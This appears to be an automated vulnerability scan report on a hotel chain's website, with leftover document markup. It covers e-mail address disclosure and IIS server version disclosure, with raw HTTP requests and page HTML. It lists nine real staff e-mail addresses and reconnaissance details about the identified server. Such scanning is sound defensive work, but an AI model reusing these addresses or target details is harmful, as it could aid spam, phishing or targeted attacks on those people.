mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:64647809; mso-list-type:hybrid; mso-list-template-ids:139243376 721929 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0D8; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Wingdings;}@list l1:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:843860152; mso-list-type:hybrid; mso-list-template-ids:-1039644228 721929 -1628119522 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0D8; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Wingdings;}@list l2:level2 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:Batang;}@list l2:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3 {mso-list-id:1399667351; mso-list-type:hybrid; mso-list-template-ids:538869484 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l3:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4 {mso-list-id:1845976926; mso-list-type:hybrid; mso-list-template-ids:-782627200 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:1941453358; mso-list-type:hybrid; mso-list-template-ids:-1688807260 -1628119522 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:Batang;}@list l5:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.5in; mso-level-number-position:left; margin-left:1.5in; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:1989821850; mso-list-type:hybrid; mso-list-template-ids:-1377918716 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l6:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:2066563486; mso-list-template-ids:-24617030;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8 {mso-list-id:2077580739; mso-list-type:hybrid; mso-list-template-ids:-1378210954 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-hansi-font-family:Times;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><a name="OLE_LINK1"></a><a name="OLE_LINK2"><spanstyle='mso-bookmark:OLE_LINK1'><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn=&quo..
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /promotions/holiday-party-offer.aspx

/promotions/holiday-party-offer.aspx

http://www.kimptonhotels.com/promotions/holiday-party-offer.aspx

Found E-mails

  • rich.gulden@fireskyresort.com
  • sean.mckean@kimptonhotels.com
  • gabriela.rojo@thecypresshotel.com
  • alexis.kagan@kimptonhotels.com
  • eric.manning@kimptonhotels.com
  • david.walovich@grandcafe-sf.com
  • dorie.hamilton@kimptonhotels.com
  • diana.bulgo@kimptonhotels.com
  • debbie.jimenez@tuscaninn.com

Request

GET /promotions/holiday-party-offer.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101951



<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Hotels &amp; Restaurants - Promotions - A Holiday Party to Remember</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Care, comfort, style, flavor, fun - Kimpton Hotels have it all. Four star boutique hotels and gourmet restaurants in San Francisco, Washington DC, Chicago and other great cities.">
<meta name="keywords" content="Kimpton boutique hotels, boutique hotels, botiuqe hotels, small luxury hotels, hip hotels, best hotels, 4 star hotels, gourmet restaurants, guest rewards program, corporate social responsibility, honeymoon hotels, wedding hotels, green hotels, pet friendly hotels, womens travel, top restaurants, business hotels">
<meta name="WT.sp" content="KC-Corp">
<script type="text/javascript" src="../_js/menucontrol.js"></script>
<script type="text/javascript" src="../_js/snipe_control.js"></script>
<script src="../_js/IEHoverPseudo.js" language="javascript"></script>
<script src="../_js/SpryMenuBar.js" type="text/javascript"></script>
<script src="../_js/rollover.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="../_css/global.css">
<!--FXID_BOOKMARK -->
<style>
.city {
font-size: 16px;
font-family: Helvetica, Arial;
font-weight: bold;
color: #7a0026;
}

a:link {color:#FFFFFF; text-decoration:none;}
a:active {color:#FFFFFF; text-decoration:none;}
a:visited {color:#FFFFFF; text-decoration:none;}
a:hover {color:#FFFFFF; text-decoration:underline;}

</style>
</head>
<body onLoad="IEHoverPseudo()">
<center>
<!-- INTOUCH INC-->
<div class="intouchinc"><DIV id=intouch_menu style="BORDER-RIGHT: #4e4d94 0px; PADDING-RIGHT: 0px; BORDER-TOP: #4e4d94 0px; PADDING-LEFT: 0px; Z-INDEX: 10; LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #4e4d94 0px; PADDING-TOP: 0px; BORDER-BOTTOM: #4e4d94 0px; POSITION: relative; TOP: -2px"><span class='kim10' id='kimwhite'><strong></strong> &nbsp;<img src='assets/clear.gif' width='1' height='11' border='0'>&nbsp; </span><span class='kim10'>&nbsp;</span></SPAN></DIV>


</div>
<div class="corner-btmlft"><div class="corner-btmrgt"><div class="corner-toplft"><div class="corner-toprgt">
<!-- TOPNAV INC START -->
<div class="navtop">
<table width="923" height="70" cellspacing="0" cellpadding="0" border="0">
<tr><td width="144"><a href="/index.aspx"><img src="../assets/logo.gif" width="144" height="50" border="0" /></a></td>
<td width="779">


<script language="Javascript">
<!--
function ClearSearchBox(theText)
{
if (theText.value == theText.defaultValue) theText.value = ""
}
//-->
</script>

<script src="/_js/popup-window.js" type="text/javascript"></script>
<script src="/_js/preload.js" type="text/javascript"></script>
<link href="/_css/topnav.css" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/_css/topnav-ie.css" rel="stylesheet" type="text/css" /><![endif]-->

<table width="780" height="38" cellpadding="0" cellspacing="0" border="0" id="primary-nav">
<tr>
<td width="89"><a href="/reservations/hotel-reservations.aspx" id="nav_reservations"><img src="/images-nav/navtop-rese-off.png" alt="Reservations" name="Reservations" width="89" height="38" border="0" id="Reservations" /></a></td>
<td width="80"><ul id="primary-nav">
<li class="menuparent"><a href="/promotions/promotions.aspx"><img src="/images-nav/navtop-prom-on.png" alt="Promotions" name="Promotions" width="80" height="38" border="0" id="Promotions" onmouseover='this.src="/images-nav/navtop-prom-on.png"' onmouseout='this.src="/images-nav/navtop-prom-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/promotions/best-rate-guarantee.aspx">Best Rate Guarantee<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hotel-packages.aspx">Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/aaa.aspx">AAA Members<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/summer-playground.aspx">Your Summer Playground<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/winter-spark.aspx">Winter Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/holiday-party-offer.aspx">Holiday Party Offer<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/dollar-deals.aspx">Just $1 More Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/government-rates.aspx">Government Rates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/sweet-tax-relief.aspx">Sweet Tax Relief<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/sunday-sleep-in.aspx">Sunday Sleep-In<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/rub-the-one-youre-with.aspx">Rub the One You're With<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/ride-the-rails.aspx">Ride the Rails<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/we-got-your-bag.aspx">We've Got Your Bag<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hybrid-parking.aspx">Hybrid Parking Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/programs/lgbt-all-play.aspx">LGBT - All Play, No Work<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/KimptonReservator">The Kimpton Reservator&trade;<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="#" onclick="popup('http://www.gifttracker.com/cgi-bin/default.asp?COID=1607')">Gift Certificates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/intouch/EMLogin.aspx">Receive Newsletters &amp; Offers<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/intouch/EMGuestUpdate.aspx">Manage My Newsletters<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
</ul>
</li>
</ul>
</li>
</ul></td>
<td width="52"><ul id="primary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx"><img src="/images-nav/navtop-hote-off.png" alt="Hotels" name="Hotels" width="52" height="38" border="0" id="Hotels" onmouseover='this.src="/images-nav/navtop-hote-on.png"' onmouseout='this.src="/images-nav/navtop-hote-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx">All Hotels<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/locations.aspx">Cities<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels-alexandria.aspx">Alexandria<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-arlington.aspx">Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-aspen.aspx">Aspen<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-atlanta.aspx">Atlanta<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-baltimore.aspx">Baltimore<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-boston.aspx">Boston/Cambridge<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-chicago.aspx">Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-dallas.aspx">Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-denver.aspx">Denver<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-losangeles.aspx">Los Angeles<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-miami.aspx">Miami<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-newyorkcity.aspx">New York City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-philadelphia.aspx">Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-portland.aspx">Portland<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-saltlakecity.aspx">Salt Lake City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sandiego.aspx">San Diego<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanfrancisco.aspx">San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-scottsdale.aspx">Scottsdale<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-seattle.aspx">Seattle<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanjose.aspx">Silicon Valley/Cupertino<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/hotels/hotels-vancouver.aspx">Vancouver, B.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/hotels/hotels-verobeach.aspx">Vero Beach<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-washingtondc.aspx">Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent"><a href="/hotels/hotel-palomars.aspx">Hotel Palomar<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-arlington/">Hotel Palomar Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-atlanta-midtown/">Hotel Palomar Atlanta-Midtown<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-chicago/">Hotel Palomar Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-dallas/">Hotel Palomar Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-los-angeles-westwood/">Hotel Palomar LA-Westwood<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-philadelphia/">Hotel Palomar Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-san-francisco/">Hotel Palomar San Francisco<img src="/assets/clear.gif" width="10" height="1" bord..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://www.kimptonhotels.com/

Extracted Version

Server: Microsoft-IIS/6.0

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hqffzavz0qccqezxot2gi5ei; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69686



<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Hotels: Boutique Hotels, Luxury Travel and Chef-Driven Gourmet Restaurants</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="WT.sp" content="KC-Corp">
<meta name="robots" content="noodp, noydir">
<meta name="description" content="Care, comfort, style, flavor, fun - Kimpton Hotels have it all. Four star boutique hotels and gourmet restaurants in San Francisco, Washington DC, Chicago and other great cities.">
<meta name="keywords" content="Kimpton boutique hotels, boutique hotels, botiuqe hotels, small luxury hotels, hip hotels, best hotels, 4 star hotels, gourmet restaurants, guest rewards program, corporate social responsibility, honeymoon hotels, wedding hotels, green hotels, pet friendly hotels, womens travel, top restaurants, business hotels">
<script type="text/javascript" src="_js/menucontrol.js"></script>
<script src="_js/IEHoverPseudo.js" language="javascript"></script>
<script src="_js/rollover.js" language="javascript"></script>
<script src="_js/snipe_control.js" language="javascript"></script>
<link rel="stylesheet" type="text/css" href="_css/global.css">
<script type="text/javascript" src="_js/swfobject.js"></script>
<script type="text/javascript">swfobject.registerObject("myId", "9.0.0", "_js/expressInstall.swf");</script>



<script language="JavaScript">
<!--
if (document.images) {
//Preload main nav bar

var mkhoff = new Image();
mkhoff.src = "images-ap-home/ap_55f_chef.jpg";
var mkhon = new Image();
mkhon.src = "images-ap-home/ap_55f_clr_chef.jpg";

}


function rollon(img) {
if (document.images){
document[img].src=eval(img+"on.src");
}
}

function rolloff(img) {
if (document.images){
document[img].src=eval(img+"off.src");
}}//-->

</script>

<script language="JavaScript">
<!--
if ((typeof section != "undefined") && (document.images))
{
eval( "m" + section + "off.src = m" + section + "on.src");
rollon ("m" + section);
}
// -->
</script>



</head>
<body onLoad="IEHoverPseudo()">
<center>
<!-- INTOUCH INC -->
<div class="intouchinc"><DIV id=intouch_menu style="BORDER-RIGHT: #4e4d94 0px; PADDING-RIGHT: 0px; BORDER-TOP: #4e4d94 0px; PADDING-LEFT: 0px; Z-INDEX: 10; LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #4e4d94 0px; PADDING-TOP: 0px; BORDER-BOTTOM: #4e4d94 0px; POSITION: relative; TOP: -2px"><span class='kim10' id='kimwhite'><strong></strong> &nbsp;<img src='assets/clear.gif' width='1' height='11' border='0'>&nbsp; </span><span class='kim10'>&nbsp;</span></SPAN></DIV>


</div>
<div class="corner-btmlft"><div class="corner-btmrgt"><div class="corner-toplft"><div class="corner-toprgt">
<!-- TOPNAV INC -->
<div class="navtopHome">
<div id="navwrapper">



<script language="Javascript">
<!--
function ClearSearchBox(theText)
{
if (theText.value == theText.defaultValue) theText.value = ""
}
//-->
</script>

<script src="/_js/popup-window.js" type="text/javascript"></script>
<script src="/_js/preload.js" type="text/javascript"></script>
<link href="/_css/topnav.css" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/_css/topnav-ie.css" rel="stylesheet" type="text/css" /><![endif]-->

<table width="780" height="38" cellpadding="0" cellspacing="0" border="0" id="primary-nav">
<tr>
<td width="89"><a href="/reservations/hotel-reservations.aspx" id="nav_reservations"><img src="/images-nav/navtop-rese-off.png" alt="Reservations" name="Reservations" width="89" height="38" border="0" id="Reservations" /></a></td>
<td width="80"><ul id="primary-nav">
<li class="menuparent"><a href="/promotions/promotions.aspx"><img src="/images-nav/navtop-prom-off.png" alt="Promotions" name="Promotions" width="80" height="38" border="0" id="Promotions" onmouseover='this.src="/images-nav/navtop-prom-on.png"' onmouseout='this.src="/images-nav/navtop-prom-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/promotions/best-rate-guarantee.aspx">Best Rate Guarantee<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hotel-packages.aspx">Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/aaa.aspx">AAA Members<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/summer-playground.aspx">Your Summer Playground<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/winter-spark.aspx">Winter Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/holiday-party-offer.aspx">Holiday Party Offer<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/dollar-deals.aspx">Just $1 More Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/government-rates.aspx">Government Rates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/sweet-tax-relief.aspx">Sweet Tax Relief<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/sunday-sleep-in.aspx">Sunday Sleep-In<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/rub-the-one-youre-with.aspx">Rub the One You're With<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/ride-the-rails.aspx">Ride the Rails<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/we-got-your-bag.aspx">We've Got Your Bag<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hybrid-parking.aspx">Hybrid Parking Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/programs/lgbt-all-play.aspx">LGBT - All Play, No Work<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/KimptonReservator">The Kimpton Reservator&trade;<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="#" onclick="popup('http://www.gifttracker.com/cgi-bin/default.asp?COID=1607')">Gift Certificates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/intouch/EMLogin.aspx">Receive Newsletters &amp; Offers<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/intouch/EMGuestUpdate.aspx">Manage My Newsletters<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
</ul>
</li>
</ul>
</li>
</ul></td>
<td width="52"><ul id="primary-nav">
